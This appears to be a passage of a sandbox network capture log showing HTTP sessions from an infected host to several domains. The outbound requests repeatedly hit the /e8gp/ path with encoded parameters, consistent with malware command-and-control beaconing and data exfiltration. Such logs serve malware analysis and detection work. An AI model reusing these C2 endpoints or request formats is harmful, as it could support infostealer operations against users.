Aug 23, 2023 14:56:23.074208021 CEST	216	IN	Data Raw: 73 20 2d 2d 3e 0a 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 23 63 66 2d 77 72 61 70 70 65 72 20 2d 2d 3e 0a 0a 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a Data Ascii: s --> </div>... /#cf-wrapper --> <script> window._cf_translation = {}; </script></body></html>
Aug 23, 2023 14:56:23.074224949 CEST	216	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
22	192.168.0.56	49187	146.148.179.231	80

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2023 14:56:33.231287956 CEST	217	OUT	POST /e8gp/ HTTP/1.1 Host: www.kuailesms.net Connection: close Content-Length: 120 Cache-Control: no-cache Origin: http://www.kuailesms.net User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/603.3.8 (KHTML, like Gecko) Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.kuailesms.net/e8gp/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 78 68 63 30 4c 32 3d 38 45 61 38 42 32 58 33 79 69 68 70 79 38 6e 7a 39 78 6e 63 62 34 4f 4c 6f 44 7a 7a 4c 6a 68 41 6b 68 33 48 70 38 66 38 55 51 45 62 74 72 31 77 77 58 41 71 44 65 39 64 43 4e 63 45 37 46 74 6a 58 48 34 50 4b 42 44 56 28 46 63 4c 65 39 47 72 64 37 67 75 75 36 48 7a 52 4f 30 61 4a 76 37 44 6b 62 35 64 47 58 58 64 66 33 50 70 39 51 29 2e 00 00 00 00 00 00 00 Data Ascii: xhc0L2=8Ea8B2X3yihpy8nz9xncb4OLoDzzLjhAkh3Hp8f8UQEbtr1wwXAqDe9dCNcE7FtjXH4PKBDV(FcLe9Grd7guu6HzRO0aJv7Dkb5dGXXdf3Pp9Q).

Session ID	Source IP	Source Port	Destination IP	Destination Port
23	192.168.0.56	49188	146.148.179.231	80

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2023 14:56:33.382880926 CEST	218	OUT	GET /e8gp/?xhc0L2=xGycCDLXwFlD+OnV5wrRAoWjiweuMz9Ju1yK0Of5U14HoqAK3y5ZJ513OPQC3HV1XCE6HQHGmC1hedXCJaVT5rHtWdIcIJC/itz9&HDp=njTTUjRhh2_ HTTP/1.1 Host: www.kuailesms.net Connection: close Data Raw: 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
24	192.168.0.56	49189	104.21.71.149	80

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2023 14:57:11.010340929 CEST	243	OUT	POST /e8gp/ HTTP/1.1 Host: www.xc3e3.fun Connection: close Content-Length: 120 Cache-Control: no-cache Origin: http://www.xc3e3.fun User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/603.3.8 (KHTML, like Gecko) Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.xc3e3.fun/e8gp/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 78 68 63 30 4c 32 3d 43 74 65 6e 4c 69 74 48 43 64 77 36 32 52 28 4a 4c 2d 78 53 65 6b 6a 79 5a 35 50 5a 78 57 30 62 62 6e 6e 4f 31 74 30 77 59 67 51 4c 54 38 65 54 4d 75 70 62 46 49 49 70 54 4c 6a 34 65 4d 33 55 46 31 39 35 43 32 32 77 50 4f 74 6e 41 73 4b 41 31 71 74 66 30 5f 74 30 6b 34 46 7a 34 5a 4a 32 42 7a 52 72 58 79 73 74 35 4b 61 6d 49 67 29 2e 00 00 00 00 00 00 00 Data Ascii: xhc0L2=CtenLitHCdw62R(JL-xSekjyZ5PZxW0bbnnO1t0wYgQLT8eTMupbFIIpTLj4eM3UF195C22wPOtnAsKA1qtf0_t0k4Fz4ZJ2BzRrXyst5KamIg).

Session ID	Source IP	Source Port	Destination IP	Destination Port
25	192.168.0.56	49190	104.21.71.149	80

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2023 14:57:11.019298077 CEST	244	OUT	GET /e8gp/?xhc0L2=Pv2HIUgDB7Qa+wzzBoxyDE7uYtzxjTUpRgqcrt0uAAtucffTC6N1FqpKGtHQdbXZZnJrDGurKZENAMbphLYijutqjr515/wKHFbk&HDp=njTTUjRhh2_ HTTP/1.1 Host: www.xc3e3.fun Connection: close Data Raw: 00 00 00 00 00 00 Data Ascii:
Aug 23, 2023 14:57:11.428344011 CEST	245	IN	HTTP/1.1 500 Internal Server Error Date: Wed, 23 Aug 2023 12:57:11 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ws3hN%2FWPtKMlJNIgHnlogVojCyGRQYIxL%2BGt3mU%2BhPSdJgetX%2F2to2wWmUX24vaGyyooKG4yk5JNrzU9x60hCyG4usUp2pzJojmLDX8u7gGL33%2BRUwkAqHgCRJJqtvMb"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7fb38513e96b9a41-FRA alt-svc: h3=":443"; ma=86400 Data Raw: 32 34 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 70 68 70 2d 66 70 6d 2d 73 74 61 74 75 73 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 78 63 33 65 33 2e 66 75 6e 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a Data Ascii: 24e<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at php-fpm-status to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache Server at www.xc3e3.fun Port 80</address></body></html>
Aug 23, 2023 14:57:11.428376913 CEST	246	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
3	192.168.0.56	49168	188.114.96.3	80

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2023 14:53:10.078119993 CEST	135	OUT	GET /e8gp/?xhc0L2=6eBq3For9zap+5OTHjEdFb+cgnEpiUG6j5oni2dGM+5uq+KZcTGOclOU9yeLFqZHdTK7cjefMM3qdKtOujwsYhywHZZM/a68NQMe&HDp=njTTUjRhh2_ HTTP/1.1 Host: www.spv88.online Connection: close Data Raw: 00 00 00 00 00 00 Data Ascii:
Aug 23, 2023 14:53:10.099064112 CEST	137	IN	HTTP/1.1 403 Forbidden Date: Wed, 23 Aug 2023 12:53:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Cache-Control: max-age=15 Expires: Wed, 23 Aug 2023 12:53:25 GMT X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yjz1AaLUU%2Bk%2BwKS4tYkMqWPBIBP1Q4ushclUAL3ml2IYfg1Cxi4610%2B%2FysPEasc4IOAbyk4zPKDJ4d2NKlUVs6DXlQfZ3h3JeMfTfJzT59yd3UBH%2BTEtCKZ0S6yGAk1EsUMv"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Server: cloudflare CF-RAY: 7fb37f320ae69219-FRA alt-svc: h3=":443"; ma=86400 Data Raw: 31 31 61 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 Data Ascii: 11a4<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Attention Required! \| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name
Aug 23, 2023 14:53:10.099066973 CEST	138	IN	Data Raw: 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 Data Ascii: ="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css"
Aug 23, 2023 14:53:10.099069118 CEST	139	IN	Data Raw: 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 Data Ascii: <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.captcha-container --> <div class="cf-section cf-wrapper"> <div class="cf-columns two"> <div class="cf-colu
Aug 23, 2023 14:53:10.099070072 CEST	141	IN	Data Raw: 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e Data Ascii: ray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">7fb37f320ae69219</strong></span> <span class="cf-footer-separator sm:hidden">•</span> <span id="cf-
Aug 23, 2023 14:53:10.099071980 CEST	141	IN	Data Raw: 73 20 2d 2d 3e 0a 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 23 63 66 2d 77 72 61 70 70 65 72 20 2d 2d 3e 0a 0a 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a Data Ascii: s --> </div>... /#cf-wrapper --> <script> window._cf_translation = {}; </script></body></html>
Aug 23, 2023 14:53:10.099072933 CEST	141	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
4	192.168.0.56	49169	146.148.179.231	80

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2023 14:53:20.544200897 CEST	142	OUT	GET /e8gp/?xhc0L2=xGycCDLXwFlD+OnV5wrRAoWjiweuMz9Ju1yK0Of5U14HoqAK3y5ZJ513OPQC3HV1XCE6HQHGmC1hedXCJaVT5rHtWdIcIJC/itwx&HDp=njTTUjRhh2_ HTTP/1.1 Host: www.kuailesms.net Connection: close Data Raw: 00 00 00 00 00 00 Data Ascii:
Aug 23, 2023 14:53:20.947252035 CEST	142	OUT	GET /e8gp/?xhc0L2=xGycCDLXwFlD+OnV5wrRAoWjiweuMz9Ju1yK0Of5U14HoqAK3y5ZJ513OPQC3HV1XCE6HQHGmC1hedXCJaVT5rHtWdIcIJC/itwx&HDp=njTTUjRhh2_ HTTP/1.1 Host: www.kuailesms.net Connection: close Data Raw: 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
5	192.168.0.56	49170	104.21.71.149	80

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2023 14:53:59.333245039 CEST	144	OUT	GET /e8gp/?xhc0L2=Pv2HIUgDB7Qa+wzzBoxyDE7uYtzxjTUpRgqcrt0uAAtucffTC6N1FqpKGtHQdbXZZnJrDGurKZENAMbphLYijutqjr515/wKHFYo&HDp=njTTUjRhh2_ HTTP/1.1 Host: www.xc3e3.fun Connection: close Data Raw: 00 00 00 00 00 00 Data Ascii:
Aug 23, 2023 14:53:59.742211103 CEST	146	IN	HTTP/1.1 500 Internal Server Error Date: Wed, 23 Aug 2023 12:53:59 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=XvcrVn6CdYr6w2y3LMYupfBZYbCE5EUVNYf4IYTbXb7ksWI96xU7LdTBGrWD2qGBh%2Fw4cXBTlbHiTP1bEOY18iD4GEmIY98hUnX9uZTdWRDTPl1xGzWSxXhwUjYVQ4wb"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7fb38065dc4718f5-FRA alt-svc: h3=":443"; ma=86400 Data Raw: 32 34 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 70 68 70 2d 66 70 6d 2d 73 74 61 74 75 73 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 78 63 33 65 33 2e 66 75 6e 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a Data Ascii: 24e<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at php-fpm-status to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache Server at www.xc3e3.fun Port 80</address></body></html>
Aug 23, 2023 14:53:59.742213964 CEST	146	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
6	192.168.0.56	49171	185.215.4.57	80

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2023 14:54:09.796497107 CEST	147	OUT	GET /e8gp/?xhc0L2=1Opkd6I8Hw0hqQTwYPZT5403YNS0Jo6p5aB/dYESwIKFU9GO+2rSmzXSuAC0uGbmcK86ZqWa9QkknXVi4rO7fYkC/qyHgn6fvkxK&HDp=njTTUjRhh2_ HTTP/1.1 Host: www.mixova.art Connection: close Data Raw: 00 00 00 00 00 00 Data Ascii:
Aug 23, 2023 14:54:09.842232943 CEST	148	IN	HTTP/1.1 301 Moved Permanently Server: ddos-guard Connection: close Set-Cookie: __ddg1_=pRBFPN01a2bU2OMKyv6j; Domain=.mixova.art; HttpOnly; Path=/; Expires=Thu, 22-Aug-2024 12:54:09 GMT Date: Wed, 23 Aug 2023 12:54:09 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 364 Location: https://www.mixova.art/e8gp/?xhc0L2=1Opkd6I8Hw0hqQTwYPZT5403YNS0Jo6p5aB/dYESwIKFU9GO+2rSmzXSuAC0uGbmcK86ZqWa9QkknXVi4rO7fYkC/qyHgn6fvkxK&HDp=njTTUjRhh2_ X-Host: www.mixova.art cache-control: max-age=0 cache-control: public Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 69 78 6f 76 61 2e 61 72 74 2f 65 38 67 70 2f 3f 78 68 63 30 4c 32 3d 31 4f 70 6b 64 36 49 38 48 77 30 68 71 51 54 77 59 50 5a 54 35 34 30 33 59 4e 53 30 4a 6f 36 70 35 61 42 2f 64 59 45 53 77 49 4b 46 55 39 47 4f 2b 32 72 53 6d 7a 58 53 75 41 43 30 75 47 62 6d 63 4b 38 36 5a 71 57 61 39 51 6b 6b 6e 58 56 69 34 72 4f 37 66 59 6b 43 2f 71 79 48 67 6e 36 66 76 6b 78 4b 26 61 6d 70 3b 48 44 70 3d 6e 6a 54 54 55 6a 52 68 68 32 5f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.mixova.art/e8gp/?xhc0L2=1Opkd6I8Hw0hqQTwYPZT5403YNS0Jo6p5aB/dYESwIKFU9GO+2rSmzXSuAC0uGbmcK86ZqWa9QkknXVi4rO7fYkC/qyHgn6fvkxK&HDp=njTTUjRhh2_">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
7	192.168.0.56	49172	192.0.78.25	80

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2023 14:54:30.982856989 CEST	150	OUT	POST /e8gp/ HTTP/1.1 Host: www.skindocworld.com Connection: close Content-Length: 120 Cache-Control: no-cache Origin: http://www.skindocworld.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/603.3.8 (KHTML, like Gecko) Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.skindocworld.com/e8gp/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 78 68 63 30 4c 32 3d 51 78 46 41 34 56 76 44 55 53 28 5f 38 70 75 6b 61 61 50 46 48 65 76 33 28 49 6a 66 64 58 66 38 75 6e 58 61 70 53 57 4e 42 75 30 5a 41 39 73 6a 69 70 30 6a 4a 77 55 6a 72 4a 73 2d 70 73 38 5a 6b 32 58 41 50 41 7a 4d 73 5a 37 31 52 4d 33 56 7e 72 78 5a 4c 33 76 4a 45 49 37 73 4f 37 33 41 51 48 70 6e 66 42 4c 5a 4d 47 51 44 73 67 29 2e 00 00 00 00 00 00 00 Data Ascii: xhc0L2=QxFA4VvDUS(_8pukaaPFHev3(IjfdXf8unXapSWNBu0ZA9sjip0jJwUjrJs-ps8Zk2XAPAzMsZ71RM3V~rxZL3vJEI7sO73AQHpnfBLZMGQDsg).
Aug 23, 2023 14:54:31.133722067 CEST	151	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Wed, 23 Aug 2023 12:54:31 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.skindocworld.com/e8gp/ X-ac: 2.hhn _dfw BYPASS Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
8	192.168.0.56	49173	192.0.78.25	80

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2023 14:54:30.991425991 CEST	150	OUT	GET /e8gp/?xhc0L2=dztg7irefDCp7IGdZLb3CPbd7rvvYQvJkQuTo0GRPbERPNhZiuoJEigDg44bvuUZ82CvJV/5juSfRsm8qKEkcmvXDbHqPdO8Wxhf&HDp=njTTUjRhh2_ HTTP/1.1 Host: www.skindocworld.com Connection: close Data Raw: 00 00 00 00 00 00 Data Ascii:
Aug 23, 2023 14:54:31.143328905 CEST	151	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Wed, 23 Aug 2023 12:54:31 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.skindocworld.com/e8gp/?xhc0L2=dztg7irefDCp7IGdZLb3CPbd7rvvYQvJkQuTo0GRPbERPNhZiuoJEigDg44bvuUZ82CvJV/5juSfRsm8qKEkcmvXDbHqPdO8Wxhf&HDp=njTTUjRhh2_ X-ac: 2.hhn _dfw BYPASS Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 